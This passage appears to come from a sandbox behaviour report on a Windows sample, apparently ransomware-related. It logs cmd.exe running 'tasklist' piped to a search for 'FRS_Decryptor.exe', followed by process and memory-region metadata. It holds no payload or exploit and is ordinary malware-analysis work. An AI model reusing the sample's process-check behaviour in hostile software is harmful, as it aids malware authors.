lpApplicationName="C:\\Windows\\system32\\tasklist.exe", lpCommandLine="tasklist", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x48f740*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tasklist", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x48f78c | out: lpCommandLine="tasklist", lpProcessInformation=0x48f78c*(hProcess=0x64, hThread=0x60, dwProcessId=0x470, dwThreadId=0x3dc)) returned 1 [0122.321] CloseHandle (hObject=0x60) returned 1 [0122.321] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0122.321] GetEnvironmentStringsW () returned 0x6642d8* [0122.321] FreeEnvironmentStringsA (penv="=") returned 1 [0122.321] DeleteProcThreadAttributeList (in: lpAttributeList=0x48f7b8 | out: lpAttributeList=0x48f7b8) [0122.321] _get_osfhandle (_FileHandle=3) returned 0x54 [0122.321] DuplicateHandle (in: hSourceProcessHandle=0x64, hSourceHandle=0x54, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0122.321] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0122.321] _close (_FileHandle=5) returned 0 [0122.321] _dup (_FileHandle=0) returned 4 [0122.321] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0122.321] _close (_FileHandle=3) returned 0 [0122.321] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0122.321] SetErrorMode (uMode=0x0) returned 0x0 [0122.322] SetErrorMode (uMode=0x1) returned 0x0 [0122.322] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6642e0, lpFilePart=0x48f85c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x48f85c*="Desktop") returned 0x1c [0122.322] SetErrorMode (uMode=0x0) returned 0x1 [0122.322] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0122.322] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0122.322] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0122.322] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0122.322] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0x48f5e8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x48f5e8) returned 0xffffffff [0122.322] GetLastError () returned 0x2 [0122.322] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0122.322] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0x48f5e8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x48f5e8) returned 0x665628 [0122.322] FindClose (in: hFindFile=0x665628 | out: hFindFile=0x665628) returned 1 [0122.322] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0x48f5e8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x48f5e8) returned 0xffffffff [0122.322] GetLastError () returned 0x2 [0122.322] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0x48f5e8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x48f5e8) returned 0x665628 [0122.322] FindClose (in: hFindFile=0x665628 | out: hFindFile=0x665628) returned 1 [0122.323] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0122.323] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0122.323] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0122.323] SetErrorMode (uMode=0x0) returned 0x0 [0122.323] SetErrorMode (uMode=0x1) returned 0x0 [0122.323] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x664668, lpFilePart=0x48f604 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x48f604*="Desktop") returned 0x1c [0122.323] SetErrorMode (uMode=0x0) returned 0x1 [0122.323] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0122.323] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0122.323] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0122.323] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0122.323] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0x48f390, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x48f390) returned 0xffffffff [0122.323] GetLastError () returned 0x2 [0122.323] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0122.323] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0x48f390, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x48f390) returned 0x6604a0 [0122.324] FindClose (in: hFindFile=0x6604a0 | out: hFindFile=0x6604a0) returned 1 [0122.324] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0x48f390, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x48f390) returned 0xffffffff [0122.324] GetLastError () returned 0x2 [0122.324] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0x48f390, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x48f390) returned 0x6604a0 [0122.324] FindClose (in: hFindFile=0x6604a0 | out: hFindFile=0x6604a0) returned 1 [0122.324] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0122.324] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0122.324] GetConsoleTitleW (in: lpConsoleTitle=0x48f88c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0122.324] InitializeProcThreadAttributeList (in: lpAttributeList=0x48f7b8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x48f79c | out: lpAttributeList=0x48f7b8, lpSize=0x48f79c) returned 1 [0122.324] UpdateProcThreadAttribute (in: lpAttributeList=0x48f7b8, dwFlags=0x0, Attribute=0x60001, lpValue=0x48f7a4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x48f7b8, lpPreviousValue=0x0) returned 1 [0122.324] GetStartupInfoW (in: lpStartupInfo=0x48f7f0 | out: lpStartupInfo=0x48f7f0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x318, hStdError=0x2c)) [0122.324] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0122.324] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0122.324] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0122.324] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0122.324] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0122.324] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0122.324] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0122.324] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0122.324] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0122.324] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0122.324] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0122.324] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0122.324] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0122.324] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0122.324] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0122.324] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0122.325] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0122.325] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0122.325] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0122.325] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0122.325] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0122.325] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0122.325] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0122.325] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0122.325] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0122.325] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0122.325] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0122.325] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0122.325] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0122.325] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0122.325] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0122.325] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0122.325] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0122.325] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0122.325] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0122.325] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0122.325] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0122.325] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0122.325] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0122.325] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0122.325] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0122.325] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0122.325] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\find.exe", lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x48f740*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find /i \"FRS_Decryptor.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x48f78c | out: lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessInformation=0x48f78c*(hProcess=0x60, hThread=0x54, dwProcessId=0x7b0, dwThreadId=0x6a8)) returned 1 [0122.328] CloseHandle (hObject=0x54) returned 1 [0122.328] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0122.328] GetEnvironmentStringsW () returned 0x66ad78* [0122.328] FreeEnvironmentStringsA (penv="=") returned 1 [0122.328] DeleteProcThreadAttributeList (in: lpAttributeList=0x48f7b8 | out: lpAttributeList=0x48f7b8) [0122.328] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0122.328] _close (_FileHandle=4) returned 0 [0122.328] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0 [0122.781] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0x48fb00 | out: lpExitCode=0x48fb00*=0x0) returned 1 [0122.781] CloseHandle (hObject=0x64) returned 1 [0122.781] WaitForSingleObject (hHandle=0x60, dwMilliseconds=0xffffffff) returned 0x0 [0122.783] GetExitCodeProcess (in: hProcess=0x60, lpExitCode=0x48fb00 | out: lpExitCode=0x48fb00*=0x0) returned 1 [0122.783] CloseHandle (hObject=0x60) returned 1 [0122.784] _get_osfhandle (_FileHandle=1) returned 0x318 [0122.784] SetConsoleMode (hConsoleHandle=0x318, dwMode=0x0) returned 0 [0122.784] _get_osfhandle (_FileHandle=1) returned 0x318 [0122.784] GetConsoleMode (in: hConsoleHandle=0x318, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0122.784] _get_osfhandle (_FileHandle=0) returned 0x24 [0122.784] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0122.784] SetConsoleInputExeNameW () returned 0x1 [0122.784] GetConsoleOutputCP () returned 0x1b5 [0122.784] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0122.784] SetThreadUILanguage (LangId=0x0) returned 0x409 [0122.784] exit (_Code=0) Process: id = "128" image_name = "tasklist.exe" filename = "c:\\windows\\syswow64\\tasklist.exe" page_root = "0xb5de000" os_pid = "0x470" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "127" os_parent_pid = "0x788" cmd_line = "tasklist" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6609 start_va = 0xa0000 end_va = 0xb6fff entry_point = 0xa0000 region_type = mapped_file name = "tasklist.exe" filename = "\\Windows\\SysWOW64\\tasklist.exe" (normalized: "c:\\windows\\syswow64\\tasklist.exe") Region: id = 6610 start_va = 0x710000 end_va = 0x72ffff entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 6611 start_va = 0x730000 end_va = 0x731fff entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 6612 start_va = 0x740000 end_va = 0x74efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 6613 start_va = 0x750000 end_va = 0x78ffff entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 6614 start_va = 0x790000 end_va = 0x7cffff entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 6615 start_va = 0x7d0000 end_va = 0x7d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 6616 start_va = 0x7e0000 end_va = 0x7e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 6617 start_va = 0x7f0000 end_va = 0x7f1fff entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 6618 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6619 start_va = 0x7ef70000 end_va = 0x7ef92fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ef70000" filename = "" Region: id = 6620 start_va = 0x7ef9a000 end_va = 0x7ef9cfff entry_point = 0x0 region_type = private name = "private_0x000000007ef9a000" filename = "" Region: id = 6621 start_va = 0x7ef9d000 end_va = 0x7ef9dfff entry_point = 0x0 region_type = private name = "private_0x000000007ef9d000" filename = "" Region: id = 6622 start_va = 0x7ef9f000 end_va = 0x7ef9ffff entry_point = 0x0 region_type = private name = "private_0x000000007ef9f000" filename = "" Region: id = 6623 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6624 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6625 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6626 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 6646 start_va = 0x9d0000 end_va = 0x9dffff entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 6647 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6648 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6649 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6654 start_va = 0x710000 end_va = 0x71ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 6655 start_va = 0x720000 end_va = 0x723fff entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 6656 start_va = 0x730000 end_va = 0x732fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Region: id = 6657 start_va = 0x800000 end_va = 0x87dfff entry_point = 0x800000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6658 start_va = 0x880000 end_va = 0x880fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 6659 start_va = 0x890000 end_va = 0x890fff entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 6660 start_va = 0x8a0000 end_va = 0x8a0fff entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 6661 start_va = 0x8b0000 end_va = 0x8bffff entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 6662 start_va = 0x8c0000 end_va = 0x8c3fff entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 6663 start_va = 0x8d0000 end_va = 0x8d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 6664 start_va = 0x8e0000 end_va = 0x8e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 6665 start_va = 0x8f0000 end_va = 0x92ffff entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 6666 start_va = 0x930000 end_va = 0x96ffff entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 6667 start_va = 0x9e0000 end_va = 0xb67fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009e0000" filename = "" Region: id = 6668 start_va = 0xbb0000 end_va = 0xcaffff entry_point = 0x0 region_type = private name = "private_0x0000000000bb0000" filename = "" Region: id = 6669 start_va = 0xcb0000 end_va = 0xe30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cb0000" filename = "" Region: id = 6670 start_va = 0xe40000 end_va = 0x223ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e40000" filename = "" Region: id = 6671 start_va = 0x2240000 end_va = 0x2381fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002240000" filename = "" Region: id = 6672 start_va = 0x2390000 end_va = 0x2664fff entry_point = 0x2390000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6673 start_va = 0x2670000 end_va = 0x2a6bfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002670000" filename = "" Region: id = 6674 start_va = 0x73430000 end_va = 0x73471fff entry_point = 0x73430000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 6675 start_va = 0x73480000 end_va = 0x734e0fff entry_point = 0x73480000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 6676 start_va = 0x734f0000 end_va = 0x734fbfff entry_point = 0x734f0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 6677 start_va = 0x73530000 end_va = 0x7353ffff entry_point = 0x73530000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 6678 start_va = 0x73540000 end_va = 0x7355afff entry_point = 0x73540000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 6679 start_va = 0x73560000 end_va = 0x73569fff entry_point = 0x73560000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 6680 start_va = 0x73570000 end_va = 0x736b7fff entry_point = 0x73570000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 6681 start_va = 0x736c0000 end_va = 0x736d1fff entry_point = 0x736c0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 6682 start_va = 0x73da0000 end_va = 0x73ddcfff entry_point = 0x73da0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 6683 start_va = 0x73de0000 end_va = 0x73df3fff entry_point = 0x73de0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 6684 start_va = 0x73e10000 end_va = 0x73e18fff entry_point = 0x73e10000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 6685 start_va = 0x73f20000 end_va = 0x73f3cfff entry_point = 0x73f20000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 6686 start_va = 0x73f40000 end_va = 0x73f6efff entry_point = 0x73f40000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 6687 start_va = 0x73f70000 end_va = 0x73f87fff entry_point = 0x73f70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 6688 start_va = 0x74310000 end_va = 0x74317fff entry_point = 0x74310000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 6689 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 6690 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 6691 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6692 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6693 start_va = 0x74bc0000 end_va = 0x74d0dfff entry_point = 0x74bc0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 6694 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 6695 start_va = 0x74d90000 end_va = 0x74e16fff entry_point = 0x74d90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 6696 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6697 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 6698 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6699 start_va = 0x75360000 end_va = 0x75456fff entry_point = 0x75360000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") 